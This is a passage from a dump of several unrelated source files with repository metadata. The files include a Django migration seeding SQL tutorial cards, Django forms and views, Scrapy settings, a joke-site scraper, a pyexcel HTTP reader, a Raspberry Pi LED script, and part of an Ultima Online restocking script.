c18, created = Card.objects.get_or_create(title='Aggregate functions ', course=d, skill=sql, level=2, duration=5, view_count=0, content='Functions that operate on the multiset of values of a column of a relation, and return a value. </br> Operations: </br> avg = average value </br> min = minimum value </br> max = maximum value </br> sum = sum of values </br> count = number of values')
c18.save()
c19, created = Card.objects.get_or_create(title='SQL Practice Problem 1', course=d, skill=sql, level=2, duration=10, view_count=0, content='Using SQL, find the number of tuples in the customer relation')
c19.save()
c20, created = Card.objects.get_or_create(title='SQL Practice Problem 2', course=d, skill=sql, level=2, duration=10, view_count=0, content='Using SQL, find average account balance at the Perryridge branch.')
c20.save()
c21, created = Card.objects.get_or_create(title='Group by', course=d, skill=sql, level=2, duration=5, view_count=0, content='The group by operator allows aggregate functions to be performed on a some subset of the relation. Example: Find the number of depositors for each branch. </br> SELECT branch-name, COUNT(DISTINCT customer-name) </br> FROM depositor, account </br> WHERE depossiter.account-number = account.account-number </br> GROUP BY branch-name')
c21.save()
c21, created = Card.objects.get_or_create(title='Having clause', course=d, skill=sql, level=2, duration=5, view_count=0, content='Predicates of the habing clause are applied after the formation of groups. Example: Find the number names of all branches where the average balance is more than $1200. </br> SELECT branch-name, AVG(balance) </br> FROM account </br> GROUP BY branch-name </br> having AVG(balance) > 1200')
c21.save()
c27, created = Card.objects.get_or_create(title='SQL Practice Problem 3', course=d, skill=sql, level=2, duration=10, view_count=0, content=schema+'</br> Using SQL, Find the name of all customers who have a loan, an accoount, or both, from the bank.' )
c27.save()
c28, created = Card.objects.get_or_create(title='RA Practice Problem 1', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content=schema+'</br> Using relational algebra, find the loan number for each loan of an amount greater than $1200.' )
c28.save()
c29, created = Card.objects.get_or_create(title='RA Practice Problem 2', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content=schema+'</br> Using relational algebra, find the name of all customers who have a loan, an accoount, or both, from the bank.' )
c29.save()
c30, created = Card.objects.get_or_create(title='RA Practice Problem 3', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content=schema+'</br> Using relational algebra, find the name of all customers who have a loan, at the Perryridge branch.' )
c30.save()
c31, created = Card.objects.get_or_create(title='RA Practice Problem 4', course=d, skill=relational_algebra, level=2, duration=5, view_count=0, content=schema+'</br> Using relational algebra, find all customers who have an account at all branches located in Brooklyn.' )
c31.save()
c32, created = Card.objects.get_or_create(title='Foreign key constraint', course=d, skill=theory, level=2, duration=10, view_count=0, content='Foreign key is used to link two tables together. Constraints on it prevent actions that would destroy links between tables and prevent invalid data from being inserted into the foreign key columb because it has to be one of the values contained in the table it points to.')
c32.save()
c33, created = Card.objects.get_or_create(title='Unique constraint', course=d, skill=theory, level=2, duration=10, view_count=0, content='Unique constraint guarantees that each value in a column is unique.')
c33.save()
c34, created = Card.objects.get_or_create(title='Not null constraint', course=d, skill=theory, level=2, duration=10, view_count=0, content='Not null guarantees that the values in a column are not null.')
c34.save()
class Migration(migrations.Migration):
dependencies = [
('app', '0002_mock_users'),
]
operations = [
migrations.RunPython(add_mock_databases_course)
]
|
[
"MbMv2017"
] |
MbMv2017
|
41c8693e05e937b38bcf53526df92cf7209d924d
|
59043eaa3e8e437901a81960619828806d894c1c
|
/venv/Lib/site-packages/boto3-stubs/resources/action.pyi
|
572289c1ebb96340a28e80ed94d14f24dd6ee9b2
|
[] |
no_license
|
erschese/Udacity_Project_3_AWS
|
7e06b2ca228c1ea84cb169f184a83227f39ba754
|
c40813e135f0fb15c64e769fd36f5e413b77e078
|
refs/heads/master
| 2022-12-31T10:03:14.222790
| 2020-10-25T08:47:49
| 2020-10-25T08:47:49
| 307,058,511
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,354
|
pyi
|
# pylint: disable=unused-argument,multiple-statements,super-init-not-called
import logging
from typing import List, Dict, Any, Union, Callable
from botocore.hooks import BaseEventHooks
from boto3.resources.model import Action, Waiter
from boto3.resources.factory import ResourceFactory
from boto3.resources.base import ServiceResource
from boto3.resources.collection import ResourceCollection
from boto3.utils import ServiceContext
logger: logging.Logger
class ServiceAction:
def __init__(
self,
action_model: Action,
factory: ResourceFactory = ...,
service_context: ServiceContext = ...,
) -> None: ...
def __call__(
self, parent: ServiceResource, *args: Any, **kwargs: Any
) -> Union[ServiceResource, List[ServiceResource], Dict[str, Any]]: ...
class BatchAction(ServiceAction):
def __call__(self, parent: ResourceCollection, *args: Any, **kwargs: Any) -> List[Dict]: ...
class WaiterAction:
def __init__(self, waiter_model: Waiter, waiter_resource_name: str) -> None: ...
def __call__(self, parent: ServiceResource, *args: Any, **kwargs: Any) -> None: ...
class CustomModeledAction:
def __init__(
self,
action_name: str,
action_model: Dict[str, Any],
function: Callable[..., Any],
event_emitter: BaseEventHooks,
) -> None: ...
|
[
"serschen@yahoo.de"
] |
serschen@yahoo.de
|
d04c5189276ac69b90876d250842817a4b4da3b7
|
e591660cba22e78d2bed0b185aaea41049f440f3
|
/fetch_player_urls/fetch_player_urls/settings.py
|
b8bac30ebb46163ed01785995a6f769869bf8182
|
[] |
no_license
|
Joe-Ferrara/nba-draft-history
|
f4faa86e9bcb0b52b1b7bfa8f134f5f9c64d93b3
|
9aa387f437828c5396cbf777f494db8123cb93e2
|
refs/heads/master
| 2022-11-23T18:02:14.261973
| 2020-07-18T00:06:42
| 2020-07-18T00:06:42
| 275,638,425
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,194
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for fetch_player_urls project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'fetch_player_urls'
SPIDER_MODULES = ['fetch_player_urls.spiders']
NEWSPIDER_MODULE = 'fetch_player_urls.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'fetch_player_urls (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'fetch_player_urls.middlewares.FetchPlayerUrlsSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'fetch_player_urls.middlewares.FetchPlayerUrlsDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'fetch_player_urls.pipelines.FetchPlayerUrlsPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"jferrara90@gmail.com"
] |
jferrara90@gmail.com
|
f03d531ce385545c40a3fe6f1781c9cf8895049e
|
f155652505e491afd6a6f33b2b8ad2881bb022d2
|
/app/xsbk.py
|
4c4e9efda5db28509aa27648f74c96bbe521172f
|
[
"MIT"
] |
permissive
|
yanglgtm/cobweb
|
7dd1287cfaf361bae00e83831a8726968d5cb4a8
|
94092b8144c7f9b8edde1ef9b6b58b46ba07b87f
|
refs/heads/master
| 2022-05-12T06:24:49.916369
| 2017-10-20T10:46:08
| 2017-10-20T10:46:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,330
|
py
|
# 抓取嗅事百科的段子
import sys
sys.path.append('..')
from cobweb.downloader import *
from cobweb.parser import *
import time
import re
def parse_joke(self):
data = self.soup.find_all('div', class_='article block untagged mb15')
content_pattern = re.compile("<div.*?content\">(.*?)<!--(.*?)-->.*?</div>", re.S)
self.content = []
for d in data:
soup_d = BeautifulSoup(str(d), 'html.parser', from_encoding='utf8')
# 用户名
name = soup_d.h2.string
# 内容(内容+时间&图片)
c = soup_d.find('div', class_='content')
# content = str(c.contents[0]).strip('\n')
# timestamp = str(c.contents[1])
re1 = content_pattern.findall(str(c))
content = re1[0][0].strip('\n').replace('<br>', '\n')
timestamp = re1[0][1]
img = soup_d.find('div', class_='thumb')
if img:
img_src = img.contents[1].contents[1]['src']
content += "[img: %s]" % str(img_src)
# 点赞数
like = soup_d.find('i', class_='number').string
j = "name: %s\ncontent: %s\ntime: %s\nlike: %s" % (str(name), content, time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(int(timestamp))), str(like))
self.content.append(j)
return self
class Sxbk:
def __init__(self):
self.page = 1
self.url = 'http://www.qiushibaike.com/hot/page/'
self.joke_lists = []
self.enable = True
self.downloader = Downloader()
self.parse = Parser(None, parse_joke)
# 下载页面
def get_page(self, num=1):
return self.downloader.get(self.url + str(num), header={
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
}, timeout=50)
# 解析段子到 list
def gen_jokes(self, html):
self.parse.set_html(html)
self.joke_lists += self.parse.parse_content().get_content()
# start
def start(self):
print('按回车开始...')
while self.enable:
n = input()
if n == 'q':
exit()
if len(self.joke_lists) < 2:
html = self.get_page(self.page)
self.gen_jokes(html)
self.page += 1
print(self.joke_lists[0])
del self.joke_lists[0]
s = Sxbk()
s.start()
|
[
"jiangyang33@gmail.com"
] |
jiangyang33@gmail.com
|
7e62bd4245f803eee240c0e728aa73886ec8b2f4
|
da9753df623ce9aeec9bebc8391ad8287b1732d9
|
/AACForm/makeReports/forms/admin_forms.py
|
fd41beb3ad3201f4fef673206822363f3ab67d36
|
[] |
no_license
|
jdboyd-github/AAC-Capstone
|
2caa840bb4a6986c6f96130b67b1a77b6a0a12fd
|
472a6fd487811002a60a7812ae2eef941e7182cc
|
refs/heads/master
| 2023-05-24T05:42:15.632005
| 2021-03-25T18:47:21
| 2021-03-25T18:47:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,940
|
py
|
"""
This file contains forms to administer the website
"""
from django import forms
from makeReports.models import (
Announcement,
College,
DegreeProgram,
Department,
GradGoal,
Report,
Rubric
)
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django_summernote.widgets import SummernoteWidget
from makeReports.choices import POSSIBLE_REQS
from .cleaners import CleanSummer
class UpdateUserForm(forms.Form):
"""
Form to update a pre-existing user by the AAC
"""
aac = forms.BooleanField(label="AAC member",required=False)
department = forms.ModelChoiceField(queryset=Department.active_objects.all().order_by("name"), label="Department", required=False,widget=forms.Select(attrs={'class':'form-control col-6'}))
first_name = forms.CharField(max_length=30,widget=forms.TextInput(attrs={'class':'form-control col-6'}))
last_name = forms.CharField(max_length=150,widget=forms.TextInput(attrs={'class':'form-control col-6'}))
email = forms.CharField(max_length=30,widget=forms.EmailInput(attrs={'class':'form-control col-6'}))
class UserUpdateUserForm(forms.Form):
"""
Form to update a user by the user themselves (fewer permissions)
"""
first_name = forms.CharField(max_length=30, widget=forms.TextInput(attrs={'class':'form-control col-6'}))
last_name = forms.CharField(max_length=150, widget=forms.TextInput(attrs={'class':'form-control col-6'}))
email = forms.CharField(max_length=30, widget=forms.EmailInput(attrs={'class':'form-control col-6'}))
class CreateDepartmentForm(forms.ModelForm):
"""
Form to create new department
"""
class Meta:
"""
Defines the model type, fields, and widgets for use by the ModelForm superclass
"""
model = Department
fields = ['name', 'college']
widgets = {
'name': forms.TextInput(attrs={'class':'form-control col-6'}),
'college': forms.Select(attrs={'class':'form-control col-6'})
}
def __init__(self,*args,**kwargs):
"""
Initializes the form and sets possible colleges to only those which are active
"""
super(CreateDepartmentForm,self).__init__(*args,**kwargs)
self.fields['college'].queryset=College.active_objects.all().order_by("name")
class GenerateReports(forms.Form):
"""
Form to generate reports
"""
year = forms.IntegerField(widget=forms.NumberInput(attrs={'class':'form-control col-6'}))
rubric = forms.ModelChoiceField(queryset=Rubric.objects.order_by('-date'), widget=forms.Select(attrs={'class':'form-control col-6'}))
class MakeNewAccount(UserCreationForm):
"""
Form for the AAC to make a new account
"""
isaac = forms.BooleanField(required=False, label="Account for AAC member?")
department = forms.ModelChoiceField(queryset=Department.active_objects, label="Department", required=False,widget=forms.Select(attrs={'class':'form-control col-6'}))
college = forms.ModelChoiceField(queryset=College.active_objects.all().order_by("name"), label="College",required=False,widget=forms.Select(attrs={'class':'form-control col-6'}))
class Meta:
"""
Defines the model type, fields, and widgets for use by the superclass ModelForm when
creating the form
"""
model = User
fields = ['email','username','password1','password2','isaac','first_name','last_name']
widgets = {
'email': forms.EmailInput(attrs={'class':'form-control col-6'}),
'username': forms.TextInput(attrs={'class':'form-control col-6'}),
'password1': forms.PasswordInput(attrs={'class':'form-control col-6'}),
'password2': forms.PasswordInput(attrs={'class':'form-control col-6'}),
'first_name': forms.TextInput(attrs={'class':'form-control col-6'}),
'last_name': forms.TextInput(attrs={'class':'form-control col-6'})
}
def is_valid(self):
valid = super().is_valid()
if not valid:
return valid
if (
self.cleaned_data["college"] and self.cleaned_data["college"]!=""
) and (
not self.cleaned_data["department"] or self.cleaned_data["department"]==""
):
self._errors["department"]="If a college is specified, a department must also be specified."
return False
return True
def save(self, commit=True):
"""
Upon creating a new user, both the Django User type and custom profile type must be created
Keyword Args:
commit (bool) : whether to actually save user to database
Returns:
user, profile : user and profile created
"""
user = super(MakeNewAccount, self).save(commit=True)
profile = user.profile
profile.aac = self.cleaned_data['isaac']
profile.department=self.cleaned_data['department']
user.save()
profile.save()
return user, profile
class AnnouncementForm(CleanSummer,forms.ModelForm):
"""
Form to create announcement by AAC
"""
text = forms.CharField(widget=SummernoteWidget(attrs={'style':'width:750px'}),label="Announcement")
summer_max_length = 2000
class Meta:
"""
Defines the model type, widgets, and fields for use by the ModelForm superclass to build the form
"""
model = Announcement
widgets = {
'expiration': forms.SelectDateWidget(),
}
fields = ['text','expiration']
class GradGoalForm(CleanSummer,forms.ModelForm):
"""
Form to create new graduate goal
"""
text = forms.CharField(widget=SummernoteWidget(attrs={'style':'width:750px'}),label="Goal text: ")
summer_max_length = 600
class Meta:
"""
Defines the model type and fields for the ModelForm superclass to use to build the form
"""
model = GradGoal
fields = ['text']
class GradGoalEditForm(CleanSummer,forms.ModelForm):
"""
Form to create edit graduate goal, including possibly archiving it
"""
text = forms.CharField(widget=SummernoteWidget(attrs={'style':'width:750px'}),label="Goal text: ")
summer_max_length = 600
class Meta:
"""
Defines the model type and fields for the ModelForm superclass to use to build the form
"""
model = GradGoal
fields = ['active','text']
class CreateReportByDept(forms.ModelForm):
"""
Form to create new report via a link that already gives department (but not degree program)
"""
class Meta:
"""
Defines the model type, fields, labels, and widgets for the superclass ModelForm
to use to build the form.
"""
model = Report
fields = ['year', 'degreeProgram']
labels = {
'degreeProgram': "Degree Program"
}
widgets = {
'year': forms.NumberInput(attrs={'class':'form-control col-6'}),
'degreeProgram': forms.Select(attrs={'class':'form-control col-6'})
}
def __init__(self,*args,**kwargs):
"""
Initializes form, sets the degree program options by the keyword argument and sets rubric options
Keyword Args:
dept (Department): department object to pick degree programs from
"""
dept = Department.objects.get(pk=kwargs.pop('dept'))
super(CreateReportByDept, self).__init__(*args, **kwargs)
self.fields['degreeProgram'].queryset = DegreeProgram.objects.filter(department=dept)
self.fields['rubric'] = forms.ModelChoiceField(queryset=Rubric.objects.all().order_by("-date"))
class CreateReportByDPForm(forms.ModelForm):
"""
Form to create report where degree program is already picked
"""
class Meta:
"""
Defines the model type, fields and widgets for the ModelForm superclass to
use to build the form
"""
model = Report
fields = ['year']
widgets = {
'year': forms.NumberInput(attrs={'class':'form-control col-6'})
}
def __init__(self,*args,**kwargs):
"""
Initializes form and sets rubric options
"""
super(CreateReportByDPForm,self).__init__(*args,**kwargs)
self.fields['rubric'] = forms.ModelChoiceField(queryset=Rubric.objects.all().order_by("-date"))
class CreateDPByDept(forms.ModelForm):
"""
Form to create degree program where department is given
"""
class Meta:
"""
Defines the model, fields, labels, and widgets for the ModelForm superclass
to use to make a form
"""
model = DegreeProgram
fields = ['name','level','cycle','startingYear']
labels = {
'name': "Name",
'level': "Level",
'cycle': "Number of years between automatically assigned reports (put 0 or leave blank if there is no regular cycle)",
'startingYear': "The first year report is assigned for cycle (leave blank if no cycle)"
}
widgets = {
'name': forms.TextInput(attrs={'class':'form-control col-6'}),
'level': forms.Select(attrs={'class':'form-control col-4'}),
'cycle': forms.NumberInput(attrs={'class':'form-control col-3','placeholder':'Cycle length'}),
'startingYear': forms.NumberInput(attrs={'class':'form-control col-3', 'placeholder':'Starting year'})
}
class RequiredReportFieldsForm(forms.Form):
"""
Form to change which fields are required to submit a report
"""
def __init__(self, *args, **kwargs):
"""
Creates the form fields from the list in POSSIBLE_REQS (from choices)
"""
super().__init__(*args,**kwargs)
for req in POSSIBLE_REQS:
self.fields[req[0]] = forms.BooleanField(required=False, label=req[1])
|
[
"smccarty@unomaha.edu"
] |
smccarty@unomaha.edu
|
de67995034fb569460fc19fdaa1b4c239db4d86d
|
01edd1a8172ef0bac49e3bf33b590e5c21b61b12
|
/pyexcel/plugins/sources/http.py
|
50e27c57f3c6e9a3778f92c7b105c9874c1945d4
|
[
"BSD-3-Clause"
] |
permissive
|
stephenrauch/pyexcel
|
89dc2868fc8f64bd6ec5eec30a0e2e8060e43fc0
|
9e4b5645e8639e874f46f7d3d846c13524f5e3e2
|
refs/heads/master
| 2020-12-31T00:30:39.208207
| 2017-03-28T23:36:32
| 2017-03-28T23:36:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,790
|
py
|
"""
pyexcel.source.http
~~~~~~~~~~~~~~~~~~~
Representation of http sources
:copyright: (c) 2015-2017 by Onni Software Ltd.
:license: New BSD License
"""
from pyexcel._compact import request, PY2
from pyexcel.source import Source
import pyexcel.constants as constants
import pyexcel.internal.parser_meta as parsers
from . import params
_xlsx = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
FILE_TYPE_MIME_TABLE = {
"text/csv": "csv",
"text/tab-separated-values": "tsv",
"application/vnd.oasis.opendocument.spreadsheet": "ods",
"application/vnd.ms-excel": "xls",
_xlsx: "xlsx",
"application/vnd.ms-excel.sheet.macroenabled.12": "xlsm"
}
class HttpSource(Source):
"""
Multiple sheet data source via http protocol
"""
fields = [params.URL]
targets = (constants.SHEET, constants.BOOK)
actions = (constants.READ_ACTION,)
attributes = [params.URL]
key = params.URL
def __init__(self, url=None, **keywords):
self.__url = url
self.__keywords = keywords
def get_data(self):
f = request.urlopen(self.__url)
info = f.info()
if PY2:
mime_type = info.type
else:
mime_type = info.get_content_type()
file_type = FILE_TYPE_MIME_TABLE.get(mime_type, None)
if file_type is None:
file_type = _get_file_type_from_url(self.__url)
parser = parsers.get_parser(file_type)
content = f.read()
sheets = parser.parse_file_content(content,
**self.__keywords)
return sheets
def get_source_info(self):
return self.__url, None
def _get_file_type_from_url(url):
extension = url.split('.')
return extension[-1]
|
[
"wangc_2011@hotmail.com"
] |
wangc_2011@hotmail.com
|
1d76b76cbfbfd483677ffc3702ea97a576b759e2
|
c661708813284f1b9059d8e2aac796d8eb9f9a66
|
/LED-Projects/blinkSignal.py
|
dfe61279606125184474400d936b66850d62cf86
|
[] |
no_license
|
KatieKrupczak/Raspberry-Pi-Projects
|
1a48a0cdb479f70920ad03e457be19e911ef9a5d
|
ef3d616c93f21f55d192f24f7771ccf21343acf6
|
refs/heads/main
| 2023-07-02T04:44:29.263592
| 2021-08-10T20:50:41
| 2021-08-10T20:50:41
| 385,388,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 91
|
py
|
from gpiozero import LED
from signal import pause
red = LED(2)
red.blink(0.5,0.5)
pause()
|
[
"katie@krupczak.org"
] |
katie@krupczak.org
|
32b7842be9c70645a3fed1f06460c58442dff64c
|
273f94d2707ef91104c74cb3de67a4d3049b3308
|
/10_decorator/adder.py
|
f24bb0db65783fd169e6a9eb07d32f73cc0bc8fa
|
[] |
no_license
|
sonicfrog-z/python_practice
|
b1ff8f22bff7c6f873afcb5b8c0fb9aa3d27ce50
|
62b7f094b235204c12566078b40c84938632b192
|
refs/heads/master
| 2020-09-29T11:28:35.484429
| 2019-12-25T04:57:36
| 2019-12-25T04:57:36
| 227,029,845
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 241
|
py
|
class Adder:
def __init__(self, base):
self._base = base
def __call__(self, value):
return self._base + value
if __name__ == '__main__':
adder5 = Adder(5)
print(adder5(10))
print(adder5(3))
|
[
"noreply@github.com"
] |
sonicfrog-z.noreply@github.com
|
135c752690ac2102b5014d59703e71a4b285792d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_circumscribed.py
|
855995f3ac2c7fd589f34f7fe49081d6facfa5ce
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
py
|
from xai.brain.wordbase.verbs._circumscribe import _CIRCUMSCRIBE
#calss header
class _CIRCUMSCRIBED(_CIRCUMSCRIBE, ):
def __init__(self,):
_CIRCUMSCRIBE.__init__(self)
self.name = "CIRCUMSCRIBED"
self.specie = 'verbs'
self.basic = "circumscribe"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
d1d059fd1b5afce933aad5bebd15a1c4f23d5d84
|
0a86a749db830a4e37ea56bee5b85608f362f9ca
|
/src/todo/views.py
|
4294bac19360252e0e4a36e13326398b5e6d3e4b
|
[] |
no_license
|
kalpitan/todobackend
|
ce1f5135055098f8edbc0ed98112e7b0bf7f3a60
|
d7ef3cf878309cb0ecbf5e950960012a6241342c
|
refs/heads/master
| 2020-06-11T04:43:24.146800
| 2016-12-10T09:16:49
| 2016-12-10T09:16:49
| 76,102,365
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 813
|
py
|
from django.shortcuts import render
from todo.models import TodoItem
from todo.serializers import TodoItemSerializer
from rest_framework import status
from rest_framework import viewsets
from rest_framework.reverse import reverse
from rest_framework.decorators import list_route
from rest_framework.response import Response
# Create your views here.
class TodoItemViewSet(viewsets.ModelViewSet):
queryset = TodoItem.objects.all()
serializer_class = TodoItemSerializer
def perform_create(self, serializer):
instance = serializer.save()
instance.url = reverse('todoitem-detail', args=[instance.pk], request=self.request)
instance.save()
def delete(self, request):
TodoItem.objects.all().delete()
return Response(status.HTTP_204_NO_CONTENT)
|
[
"kalpitan@gmail.com"
] |
kalpitan@gmail.com
|
caed78d6766fc3bd1951a808d82dd3a22ab5f2b2
|
cec0f1c7425c1cfcfefdae67d99ab5d14e37c34c
|
/Butler/ButlerHelper.py
|
8b184bbf7aa044baa7dcd557ed26846c65481b4e
|
[] |
no_license
|
SaintDismas1/Scripts
|
7e2ec1feebec14d343adb62cdc57318f23eea3f2
|
cd4a89e3e9b8f8a53979f607e366059fd209ee18
|
refs/heads/master
| 2023-08-02T19:29:25.050839
| 2021-09-15T12:37:18
| 2021-09-15T12:37:18
| 407,970,818
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,602
|
py
|
# ButlerHelper by Spatchel & Matsamilla
# use with ButlerProfiles.py for best results, update butlerID with butler serial below
# Last updated 3/16/21 -
# •Cap option
# •Wont grab armor if layer is occupied
# •Stops if butler not found
# •Waits until in range of butler
###########################################################
# Add your butlers serial below #
###########################################################
butlerID = 0x0029C3D1 #add your butler serial here
###########################################################
# Option to equip armor, bag regs & bag pots below #
###########################################################
from System.Collections.Generic import List
import sys
# 4 = equip armor, 5 = bag regs, 6 = bag pots (switch = List[int]([0,4,5,6]) would do all
switch = List[int]([0,4])
###########################################################
# If you dont run ButlerProfiles.py, this will load #
###########################################################
regs = 50 # default reg count if not profile
armor = 0 # default armor, 0=no 1=yes
cap = 0 # cap in default profile, 0=no 1=yes
bandies = 100 # default bandage count
arrows = 0
bolts = 0
######## NO TOUCHY BELOW THIS #############################
butler = Mobiles.FindBySerial(butlerID)
randomPause = 150
player_bag = Items.FindBySerial(Player.Backpack.Serial)
if butler == None:
Player.HeadMessage(33, 'Butler not found, stoppling')
sys.exit()
while Player.DistanceTo(butler) > 2.5:
if Timer.Check('butler') == False:
Mobiles.Message(butler,33, 'Come closer to restock.')
Timer.Create('butler',2500)
#moss
if Misc.CheckSharedValue('moss'):
moss6 = Misc.ReadSharedValue('moss')
else:
moss6 = regs
#ash count
if Misc.CheckSharedValue('ash'):
ash7 = Misc.ReadSharedValue('ash')
else:
ash7 = regs
# root count
if Misc.CheckSharedValue('root'):
root8 = Misc.ReadSharedValue('root')
else:
root8 = regs
# pearl count
if Misc.CheckSharedValue('pearl'):
pearl9 = Misc.ReadSharedValue('pearl')
else:
pearl9 = regs
#nightshade count
if Misc.CheckSharedValue('shade'):
shade10 = Misc.ReadSharedValue('shade')
else:
shade10 = regs
# Ginseng count
if Misc.CheckSharedValue('ginseng'):
ginseng11 = Misc.ReadSharedValue('ginseng')
else:
ginseng11 = regs
# Garlic Count
if Misc.CheckSharedValue('garlic'):
garlic12 = Misc.ReadSharedValue('garlic')
else:
garlic12 = regs
# Silk Count
if Misc.CheckSharedValue('silk'):
silk13 = Misc.ReadSharedValue('silk')
else:
silk13 = regs
# armor cap
if Misc.CheckSharedValue('cap'):
cap0 = Misc.ReadSharedValue('cap')
else:
cap0 = cap
# Armor
if Misc.CheckSharedValue('armor'):
armorS = Misc.ReadSharedValue('armor')
gorget1 = armorS
sleeves2 = armorS
gloves3 = armorS
tunic4 = armorS
legs5 = armorS
else:
cap0 = cap
gorget1 = armor
sleeves2 = armor
gloves3 = armor
tunic4 = armor
legs5 = armor
# Check if layer is taken, dont grab armor if is
layers = [ ('Head',0),('Neck',1), ('Arms',2), ('Gloves',3),('InnerTorso',4),('Pants',5) ]
for i in layers:
if Player.CheckLayer(i[0]):
if i[1] == 0:
cap0 = 0
elif i[1] == 1:
gorget1 = 0
elif i[1] == 2:
sleeves2 = 0
elif i[1] == 3:
gloves3 = 0
elif i[1] == 4:
tunic4 = 0
elif i[1] == 5:
legs5 = 0
# Explode Pots Count
if Misc.CheckSharedValue('exp'):
exp14 = Misc.ReadSharedValue('exp')
else:
exp14 = 0
# Strength Pots Count
if Misc.CheckSharedValue('str'):
str15 = Misc.ReadSharedValue('str')
else:
str15 = 0
# Refresh Pots Count
if Misc.CheckSharedValue('refresh'):
refresh16 = Misc.ReadSharedValue('refresh')
else:
refresh16 = 0
# Agility Pots Count
if Misc.CheckSharedValue('agil'):
agi17 = Misc.ReadSharedValue('agil')
else:
agi17 = 0
# Heal Pots Count
if Misc.CheckSharedValue('heal'):
heal18 = Misc.ReadSharedValue('heal')
else:
heal18 = 0
# Cure Pots Count
if Misc.CheckSharedValue('cure'):
cure19 = Misc.ReadSharedValue('cure')
else:
cure19 = 0
# Bandages Pots Count
if Misc.CheckSharedValue('bandies'):
bandages20 = Misc.ReadSharedValue('bandies')
else:
bandages20 = bandies
# Arrows
if Misc.CheckSharedValue('arrows'):
arrows24 = Misc.ReadSharedValue('arrows')
else:
arrows24 = arrows
# Bolts
if Misc.CheckSharedValue('bolts'):
bolts25 = Misc.ReadSharedValue('bolts')
else:
bolts25 = bolts
def dumpBottles():
for i in player_bag.Contains:
if i.ItemID == 0x0F0E:
Items.Move(i, butlerID, 0)
Misc.Pause(600)
def butler():
global saveSwitch
Mobiles.UseMobile(butlerID)
Gumps.WaitForGump(989312372, 2000)
if Gumps.LastGumpTextExist( 'Remove Leather Tub?' ):
Misc.SendMessage('Leather Tub Detected')
saveSwitch = 5
withdrawSwitch = 8
else:
saveSwitch = 3
withdrawSwitch = 6
#################### Armor #######################################
textid = List[int]([0])
text = List[str]([str(cap0)])
saveProfile(textid, text)
textid = List[int]([1])
text = List[str]([str(gorget1)])
saveProfile(textid, text)
textid = List[int]([2])
text = List[str]([str(sleeves2)])
